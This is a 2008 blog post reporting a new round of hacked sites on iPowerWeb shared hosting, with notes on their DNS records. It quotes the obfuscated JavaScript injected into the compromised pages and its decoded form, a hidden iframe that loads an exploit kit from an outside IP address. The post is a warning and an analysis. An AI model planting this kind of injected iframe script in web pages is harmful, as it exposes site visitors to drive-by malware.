Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...